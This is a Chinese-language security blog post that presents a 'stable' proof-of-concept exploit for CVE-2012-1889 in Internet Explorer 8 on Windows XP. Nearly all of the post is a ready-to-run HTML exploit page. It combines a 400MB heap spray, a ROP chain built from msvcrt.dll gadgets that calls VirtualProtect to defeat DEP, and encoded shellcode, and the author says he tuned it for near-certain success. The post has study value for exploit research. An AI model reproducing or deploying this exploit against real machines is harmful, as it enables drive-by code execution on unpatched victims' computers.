kg:IE8 CVE20121889 BypassDEP Stable PoC

27 Apr 2017 - evi1m0

猪肉场事件过后我就跑去考古了,原文也不知道啥时候能再公开,这次巧遇前几年比较火的挂马洞,我测试过程中发现网上好多 Blog 发布的 PoC 在 IE8 下怎么都不好使,甚至连 ShellCode 都跳不过去,调试发现喷射的内存块有问题。也有在用 Metasploit exploit/windows/browser/msxml_get_definition_code_exec 模块的,配置好 PAYLOAD CMD SRVHOST 生成后我看了下代码,“效果”按道理讲应该很强大,可惜上一次败一次。:<

我修改了下内存块密度和大小,重置了下 ROP 测试后基本百分百了:656417b1040646cbc6afdeded43c4613

<html>
<head>
    <title>IE8 CVE-2012-1889 BypassDEP Stable PoC</title>
</head>
<body>
<!--
    Tested: WinXP 5.1.2600 Service Pack 3 Build 2600 IE8
    Create: 2017-04-25, evi1m0.bat[at]gmail.com
    msxml3!_dispatchImpl::InvokeHelper+0x9c:
    037dd75a ff7528          push    dword ptr [ebp+28h]
    037dd75d 8b08            mov     ecx,dword ptr [eax]
    037dd75f ff7524          push    dword ptr [ebp+24h]
    037dd762 ff7520          push    dword ptr [ebp+20h]
    037dd765 57              push    edi
    037dd766 6a03            push    3
    037dd768 ff7514          push    dword ptr [ebp+14h]
    037dd76b 68f8a77d03      push    offset msxml3!GUID_NULL (037da7f8)
    037dd770 53              push    ebx
    037dd771 50              push    eax
    037dd772 ff5118          call    dword ptr [ecx+18h] // <<<
    037dd775 89450c          mov     dword ptr [ebp+0Ch],eax
    037dd778 8b06            mov     eax,dword ptr [esi]
    037dd77a 56              push    esi
    037dd77b ff5008          call    dword ptr [eax+8]   // <<<
    037dd77e eb79            jmp     msxml3!_dispatchImpl::InvokeHelper+0x13b (037dd7f9)
-->
    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='poc'></object>
    <script>
        var shellcode = unescape("%u16eb%u315b%u50c0%ubb53%u23ad"+
                        "%u7c86%ud3ff%uc031%ubb50%ucafa%u7c81%ud"+
                        "3ff%ue5e8%uffff%u63ff%u6c61%u2e63%u7865"+
                        "%u0065");
        var rop_chain = unescape(
            // Rop Stackpivot
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            "%ubc13%u77be" + // 0x77bebc13 # POP EBP # RETN [msvcrt.dll]
            "%u5ED5%u77BE" + // 0x77BE5ED5 # xchg eax, esp # retn [msvcrt.dll]
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            "%u5ED6%u77BE" + // 0x77BE5ED6 # retn [msvcrt.dll]
            // Mana VirtualProtect
            "%ubc13%u77be" + // 0x77bebc13 # POP EBP # RETN [msvcrt.dll]
            "%ubc13%u77be" + // 0x77bebc13 # skip 4 bytes [msvcrt.dll]
            "%u5515%u77c0" + // 0x77c05515 # POP EBX # RETN [msvcrt.dll]
            "%u0201%u0000" + // 0x00000201 # 0x00000201-> ebx
            "%u0cb3%u77c2" + // 0x77c20cb3 # POP EDX # RETN [msvcrt.dll]
            "%u0040%u0000" + // 0x00000040 # 0x00000040-> edx
            "%u09ea%u77c1" + // 0x77c109ea # POP ECX # RETN [msvcrt.dll]
            "%ufa05%u77c2" + // 0x77c2fa05 # &Writable location [msvcrt.dll]
            "%u7a41%u77c1" + // 0x77c17a41 # POP EDI # RETN [msvcrt.dll]
            "%u6101%u77c1" + // 0x77c16101 # RETN (ROP NOP) [msvcrt.dll]
            "%u9dd4%u77c0" + // 0x77c09dd4 # POP ESI # RETN [msvcrt.dll]
            "%uaacc%u77bf" + // 0x77bfaacc # JMP [EAX] [msvcrt.dll]
            "%u1d16%u77bf" + // 0x77bf1d16 # POP EAX # RETN [msvcrt.dll]
            "%u1131%u77be" + // 0x77be1120 # 0x20-0xEF&VirtualProtect() [IAT msvcrt.dll]
            "%u67f0%u77c2" + // 0x77c267f0 # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
            "%u1025%u77c2" + // 0x77c21025 # ptr to 'push esp # ret ' [msvcrt.dll]
            "");

        // HeapSpray 400MB
        var fill = "\u0c0c\u0c0c";
        while (fill.length < 0x1000) fill += fill;
        padding  = fill.substring(0, 0x5F6);
        evilcode = padding + rop_chain + shellcode;
        evilcode += fill.substring(0, 0x800 - padding.length - rop_chain.length - shellcode.length);
        while (evilcode.length < 0x100000) evilcode += evilcode;
        var block = evilcode.substring(2, 0x100000 - 0x21);
        var slide = new Array();
        for (var i = 0; i < 400; i++){
            slide[i] = block.substring(0, block.length);
        }

        alert("Allocated!");

        // 0c0c0c08
        var obj = document.getElementById('poc').object;
        var src = unescape("%u0c08%u0c0c");
        while (src.length < 0x1002) src += src;
        src = "\\\\xxx" + src;
        src = src.substr(0, 0x1000 - 10);
        var pic = document.createElement("img");
        pic.src = src;
        pic.nameProp;
        obj.definition(0);
    </script>
</body>
</html>
评论插件使用 Disqus ,需翻墙才能查看及留言。